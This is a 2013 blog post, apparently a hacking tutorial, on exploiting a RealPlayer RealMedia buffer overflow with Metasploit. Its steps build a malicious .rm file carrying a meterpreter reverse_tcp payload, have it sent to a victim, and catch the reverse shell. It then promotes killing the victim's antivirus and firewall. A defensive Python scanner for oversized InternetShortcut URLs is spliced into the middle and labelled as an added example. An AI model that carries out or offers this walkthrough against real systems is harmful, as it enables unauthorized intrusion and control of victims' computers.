Thursday, January 3, 2013

Remote System Hacking using Real Player



RealPlayer RealMedia File Handling Buffer Overflow

This module exploits a stack-based buffer overflow in RealPlayer <= 15.0.6.14. The vulnerability exists in the handling of RealMedia files, due to the insecure use of the GetPrivateProfileString function to retrieve the URL property from an InternetShortcut section. This module generates a malicious .rm file which must be opened with RealPlayer via drag-and-drop or double-click. It has been tested successfully on Windows XP SP3 with RealPlayer 15.0.5.109.
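The root cause named above (the URL value of an [InternetShortcut] section is read with GetPrivateProfileString into a fixed-size stack buffer) suggests a simple defensive check: flag any .rm file that carries an INI-style InternetShortcut section whose URL value is far longer than a legitimate link. The following scanner is an added example written for this post, not code from the Metasploit module or from RealNetworks; the length threshold and the two sample byte strings are constructed for illustration, and a real deployment would tune the threshold and run the check on a mail gateway or file-drop share. The durable fix, of course, is updating RealPlayer past the affected versions.

```python
"""
Added example (not from the original post): heuristic scanner that flags
RealMedia (.rm) files containing an [InternetShortcut] section with an
oversized URL value, the input the vulnerable RealPlayer builds mishandle.
"""
import re
from typing import Optional

# Assumed threshold for this example; tune it to what your environment sees.
MAX_URL_LEN = 260

# GetPrivateProfileString's view of a file: "[Section]" headers and
# "key=value" lines, with names matched case-insensitively.
_SECTION_RE = re.compile(rb"^\s*\[([^\]\r\n]+)\]\s*$")
_KEY_RE = re.compile(rb"^\s*([^=\r\n]+?)\s*=\s*(.*?)\s*$")


def find_internetshortcut_url(data: bytes) -> Optional[bytes]:
    """Return the URL value of the first [InternetShortcut] section, or None."""
    in_section = False
    for line in data.splitlines():
        m = _SECTION_RE.match(line)
        if m:
            in_section = m.group(1).strip().lower() == b"internetshortcut"
            continue
        if not in_section:
            continue
        m = _KEY_RE.match(line)
        if m and m.group(1).lower() == b"url":
            return m.group(2)
    return None


def is_suspicious_rm(data: bytes, max_url_len: int = MAX_URL_LEN) -> bool:
    """True when the file carries a URL value longer than max_url_len bytes."""
    url = find_internetshortcut_url(data)
    return url is not None and len(url) > max_url_len


def scan_file(path: str, max_url_len: int = MAX_URL_LEN) -> bool:
    """Scan a file on disk; returns True if it should be quarantined."""
    with open(path, "rb") as fh:
        return is_suspicious_rm(fh.read(), max_url_len)


# Constructed samples (not real RealMedia files): a fake ".RMF" header
# followed by an INI-style shortcut section, once with a normal link and
# once with an excessively long one.
BENIGN_SAMPLE = (b".RMF" + b"\x00" * 12 +
                 b"\r\n[InternetShortcut]\r\nURL=http://example.com/clip.rm\r\n")
OVERSIZED_SAMPLE = (b".RMF" + b"\x00" * 12 +
                    b"\r\n[InternetShortcut]\r\nURL=http://example.com/" +
                    b"a" * 2000 + b"\r\n")

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_SAMPLE), ("oversized", OVERSIZED_SAMPLE)):
        print(name, "SUSPICIOUS" if is_suspicious_rm(blob) else "ok")
```

The parser deliberately mirrors the INI semantics the vulnerable code relies on (bracketed section names, key=value lines, case-insensitive matching) rather than the RealMedia container format, because that is the view through which the oversized value reaches the stack buffer.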

Exploit Targets :

  • Windows XP SP3 / Real Player 15.0.5.109 (default)

Requirements :

Attacker : BackTrack
Victim : Windows XP

Step 1 : open a terminal and type msfconsole to start the Metasploit Framework.


Step 2 : use exploit/Techtecno2u_custom_exploits/RealMedia_File_Handling_bof (in the previous post we downloaded this exploit from the Exploit Database and added it to our custom folder)


Step 3 : set payload windows/meterpreter/reverse_tcp

show options 
set FILENAME clip.rm  
set LHOST 192.168.56.101
exploit


As the exploit runs, the malicious file clip.rm is generated in the root directory, as shown in the figure.
Now we need to send this file to the remote system; if the remote system is running the old, unpatched version of the software, it can be easily compromised.

Step 4 : use exploit/multi/handler (we use the multi handler to receive the reverse connection)
Step 5 : set payload windows/meterpreter/reverse_tcp
Step 6 : exploit
As the victim clicks on the file, the handler receives the connection and we get a meterpreter session.


Step 7 : type shell to get a remote shell.
Let's check the IP address of the remote system.


Now we can perform whatever we want on the remote system, such as uploading or downloading any file, killing the antivirus, killing the firewall, etc. These operations are all post-exploitation, which we will discuss soon... So it's the very fun part of hacking; to learn how to kill, or how to download or upload files, keep watching.....





